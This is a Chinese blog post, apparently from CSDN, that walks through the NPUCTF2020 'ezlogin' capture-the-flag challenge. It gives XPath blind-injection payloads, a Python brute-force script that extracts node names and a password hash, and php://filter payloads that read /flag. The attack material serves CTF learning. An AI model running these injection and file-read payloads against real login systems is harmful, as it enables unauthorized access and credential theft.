xpath注入[NPUCTF2020]ezlogin

最新推荐文章于 2023-04-14 17:38:32 发布
最新推荐文章于 2023-04-14 17:38:32 发布
阅读量663 收藏
点赞数
文章标签: 数据库 服务器 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128959974
版权

[NPUCTF2020]ezlogin

打开界面

如果发现自己输入的信息由这样构成,可以往xpath注入上靠一下。

 

不管输入什么,很容易发现登陆就超时了,说明这里token是不断刷新的。

 这样构造也是一样的目的都是为了闭合后面的',为啥有两个or呢

username=' ' or count(/)=1 or 1='1 ' and password=1

false or true or true and false   ,如果是两个   false or true and false 不就是false了吗

这条命令是判断根目录有几个结点, 

通过不同的回显,这道题采用盲注的手段通过回显位来判断。

 

 

一、获取根目录名字


'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>

 二、获取根目录上面的目录个数

 依次类推就可以判断n次目录下面的 子目录

三、获取目录名字的长度

'or string-length(name(/*[1]))=4 or ' '='

这样xpath基本操作就都了解了

id:        'or substring(name(/root/accounts/user/*[1]), {}, 1)='{}'  or ''=''or     username:        substring(name(/root/accounts/user/*[2]), {}, 1)='{}' or ''=''or password:         substring(name(/root/accounts/user/*[3]), {}, 1)='{}' or ''='

 

import requests
import re
import time
s = requests.session()
url ='http://50869d19-fe92-4610-9af0-a294499acdf9.node4.buuoj.cn:81/login.php'
head ={
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",
    "Content-Type": "application/xml"
}
find =re.compile('<input type="hidden" id="token" value="(.*?)" />')
strs ='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
flag =''
for i in range(1,100):
    for j in strs:
        r = s.post(url=url)
        token = find.findall(r.text)
        #猜测根节点名称
        #payload_1 = "<username>'or substring(name(/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #猜测子节点名称
       # payload_2 = "<username>'or substring(name(/root/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #猜测accounts的节点
        # payload_3 ="<username>'or substring(name(/root/accounts/*[1]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #猜测user节点
        #payload_4 ="<username>'or substring(name(/root/accounts/user/*[3]), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        # #跑用户名和密码
       # payload_username ="<username>'or substring(/root/accounts/user[2]/username/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #
        payload_password ="<username>'or substring(/root/accounts/user[2]/password/text(), {}, 1)='{}'  or ''='</username><password>3123</password><token>{}</token>".format(i,j,token[0])
        #

        print(payload_password)
        r = s.post(url=url,headers=head,data=payload_password)
        time.sleep(0.2)
        print(r.text)


        if "非法操作" in r.text:
            flag+=j
            print(flag)
            break

    if "用户名或密码错误!" in r.text:
        break

print(flag)

一般都是md5存储数据的解密得到 

adm1n
gtfly123  cf7414b5bdb2e65ee43083f4ddbc4d9f
 

有的时候会因为网络报错,加一个time.sleep就可以了。

进入后发现,file=可能有路径穿越漏洞,或者任意文件读取漏洞

然后下面base64解码得到,flag  in /flag

直接用filter读取协议试一下

phP://filter/convert.bAse64-encode/resource=/flag

PHP://filter/string.toupper/resource=/flag   转换为大写都可以绕过

 

 

偶尔躲躲乌云334
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[NPUCTF2020]ezlogin
怪味巧克力的博客
07-16 1190
0x01 首页如上,是一个登录的页面,而且这个页面是有时间限制的,超过一定时间没登录就需要刷新页面重新登录。我们抓包看看 登录的时候一个session只能存在一定的时间,通过抓包的内容来看,这里要用到Xpath的知识点 关于Xpath参考https://www.cnblogs.com/backlion/p/8554749.html xpath注入主要有两种,一种是普通的注入,另外一种是布尔注入。普通注入对应union注入,使用|来完成和union类似的功能,布尔注入则是布尔盲注。 这里使用大佬的脚本爆破
青少年CTF练习平台 EzLogin exp
最新发布
2301_80395418的博客
05-31 270
【代码】青少年CTF练习平台 EzLogin exp。
从MySQL注入XPath注入
m0_69305074的博客
04-28 1040
0x00 XPath基础知识 这个部分只是单纯铺垫XPath基础知识,不涉及注入,了解XPath可以跳过 这里直接引用 w3school的XPath教程 中间的案例,因为里面给了好多示例,基本一看就懂的那种。 XPath是什么? XPath是用来从XML文档中进行查找信息的语言。 XPath节点(Node) XPath中有7种类型的节点:元素、属性、文本、命名空间、处理指令、注释以及文档(根)节点 这个没有太大了解的必要,知道节点这个名词就够了,不需要分得特别细致。 选取节点 后面都以..
2022美团网络安全高校挑战赛(初赛)babyjava(XPath注入)
weixin_63231007的博客
09-18 1383
xpath=user1' and substring(/root/user/username[1]/text(),1,1)='a' and ''=' #测username[1]xpath=user1' and substring(name(/root/*),1,1)='r' and ''=' # 盲注得到结点名为user。xpath=user1' and substring(name(/*),1,1)='r' and ''=' # 盲注得到结点名为root。盲注得出,username[1]为user1。
安全测试之XPath注入攻击
热门推荐
小太阳~
01-26 1万+
一、XPath注入攻击的概念Xpath注入攻击本质上和SQL注入攻击是类似的,都是输入一些恶意的查询等代码字符串,从而对网站进行攻击。 XPath注入攻击,是指利用XPath 解析器的松散输入和容错特性,能够在 URL、表单或其它信息上附带恶意的XPath 查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关
测试XPath注入.docx
09-06
测试XPath注入 XPath 注入是指攻击者通过提交恶意的 XPath 查询来破坏应用程序的逻辑或获取未授权访问的数据的安全漏洞。XPath 是一种用于导航 XML 文档并从中获取数据的解释型语言。许多时候,一个 XPath 表达式...
xcat:XPath注入工具
05-02
XCat是一个命令行工具,可以利用和调查XPath盲注漏洞。 有关完整的参考,请阅读此处的文档: : 它支持大量功能: 自动选择注射(运行xcat injections以获得列表) 检测xpath解析器的版本和功能,并选择最快的...
xxxpwn:高级 XPath 注入工具
06-09
xxxpwn : XPath 过滤扩展工具 : 专为盲优化 XPath 1 注入攻击而设计 xxxpwn 使用各种 XPath 优化来查询来自存在 XPath 注入的位置提供的后端 XML 文档的自定义信息。 默认情况下,它会尝试检索整个远程数据库,尽管...
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
Xpath注入攻击及其防御技术研究
10-10
Xpath注入攻击及其防御技术研究 详细解释xpath攻击类型 与预防方法
EZ-Login:Flask最简单的登录系统
03-08
EZ登录 要求 您只需要安装Python和Flask。 要获得Flask,您可以通过pip install Flask或进行pip3 install Flask 。 设置 设置登录系统非常简单。 您实际上无法进行git clone因为您只需要克隆一个文件夹即可。 复制并粘贴并将其放入名为Login.py的文件中。 接下来创建一个名为Users.json全新JSON文件。 确保它与Login.py在同一目录中,并确保其中没有数据。 空白表示: {} 。
xpath注入详解
weixin_30822451的博客
03-13 465
0x01 什么是xpath XPath即为XML路径语言,是W3C XSLT标准的主要元素,它是一种用来确定XML(标准通用标记语言的子集)文档中某部分位置的语言。 XPath基于XML的树状结构,有不同类型的节点,包括元素节点,属性节点和文本节点,提供在数据结构树中找寻节点的能力,可用来在XML文档中对元素和属性进行遍历。 XPath 使用路径表达式来选取 X...
web渗透--27--XPath注入
武天旭的博客
09-16 1056
1、漏洞描述: XPath是主要针对XML文档部分寻址而设计研发的一种语言。XPath注入攻击是指利用XPath解析器的松散输入和容错特性,能够在URL、表单或其它信息上附带恶意的XPath查询代码,以获得权限信息的访问权并更改这些信息。XPath注入攻击是针对Web服务应用新的攻击方法,它允许攻击者在事先不知道XPath查询相关知识的情况下,通过XPath查询得到一个XML文档的完整内容。 XPath注入攻击利用两种技术,即XPath扫描和XPath...
XPATH 注入的介绍与代码防御
我就是我的博客
02-28 405
软件未正确对 XML 中使用的特殊元素进行无害化处理,导致攻击者能够在终端系统处理 XML 的语法、内容或命令之前对其进行修改。在 XML 中,特殊元素可能包括保留字或字符,例如“”、“"”和“&”,它们可能用于添加新数据或修改 XML 语法。我们发现用户可控制的输入并未由应用程序正确进行无害化处理,就在 XPath 查询中使用。例如,假定 XML 文档包含“user”名称的元素,每个元素各包含
悟空云课堂 | 第六期:XPath注入漏洞
Tianqi_Wukong的博客
07-06 422
该栏目为中科天齐软件安全中心全新规划的悟空云课堂,每周五准时上线,旨在科普软件安全相关知识,助力企业有效防范软件安全漏洞,提升网络安全防护能力。 本期主题为XPath注入漏洞的相关介绍。 01 什么是XPath注入漏洞? XPath是一种用来在内存中导航整个XML树的语言,它使用路径表达式来选取XML文档中的节点或者节点集。 XPath注入是指程序使用外部输入动态构造用于从XML数据库检索数据的XPath表达式,但它没有过滤或错误地过滤该输入,这使攻击者可以控制查询的结构。攻击者可以控制从XML数据库中.
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 437
xPATH
NUAA CTF校赛Web ezlogin
WeiDuoe的博客
04-14 437
看到提示说要让传入的username和password的MD5值强相等并且username和password弱相等,于是想到如果传入的不是字符串而是数组,不但md5()函数不会报错,结果还会返回null,在强比较里面null=null为true,构造payload,username[]=1&password[]=2。file=setu于猜测是最后加了.php,于是去掉.php的后缀后最终读到了base64加密后的源码。,这样子表示可能是文件包含漏洞的考点,于是尝试读取一下源码,尝试。Ctrl+u查看源码。
SQL 注入XPath 注入、代码注入 示例
06-09
这就是 XPath 注入攻击的典型案例。 代码注入示例: 假设我们有一个执行用户输入的代码的功能,对应的代码为: ``` string code = Request.Params["code"]; object result = Eval(code); ``` 攻击者可以通过输入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值